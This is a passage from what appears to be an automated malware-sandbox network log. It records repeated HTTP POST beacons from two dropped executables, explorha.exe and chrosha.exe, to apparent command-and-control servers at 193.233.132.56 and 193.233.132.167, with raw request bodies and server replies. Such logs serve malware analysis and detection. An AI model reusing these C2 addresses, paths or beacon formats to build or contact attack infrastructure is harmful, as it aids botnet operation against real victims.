                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:16.685324907 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1153192.168.2.551007193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:16.496136904 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:16.743957996 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1154192.168.2.551008193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:16.990781069 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:17.236195087 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1155192.168.2.551009193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:17.037487984 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:17.281054974 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1156192.168.2.551010193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:17.535883904 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:17.788589954 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1157192.168.2.551011193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:17.589005947 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:17.833724022 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1158192.168.2.551012193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:18.087223053 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:18.341687918 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1159192.168.2.551013193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:18.154568911 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:18.405741930 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1160192.168.2.551014193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:18.657481909 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:18.910665989 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1161192.168.2.551015193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:18.696407080 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:18.943959951 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1162192.168.2.551016193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:19.196639061 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:19.448587894 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1163192.168.2.551017193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:19.275003910 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:19.520519972 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1164192.168.2.551018193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:19.769016981 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:20.018354893 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1165192.168.2.551019193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:19.811000109 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:20.055469036 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1166192.168.2.551020193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:20.311156988 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:20.566304922 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1167192.168.2.551021193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:20.380181074 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:20.624376059 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1168192.168.2.551022193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:20.878110886 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
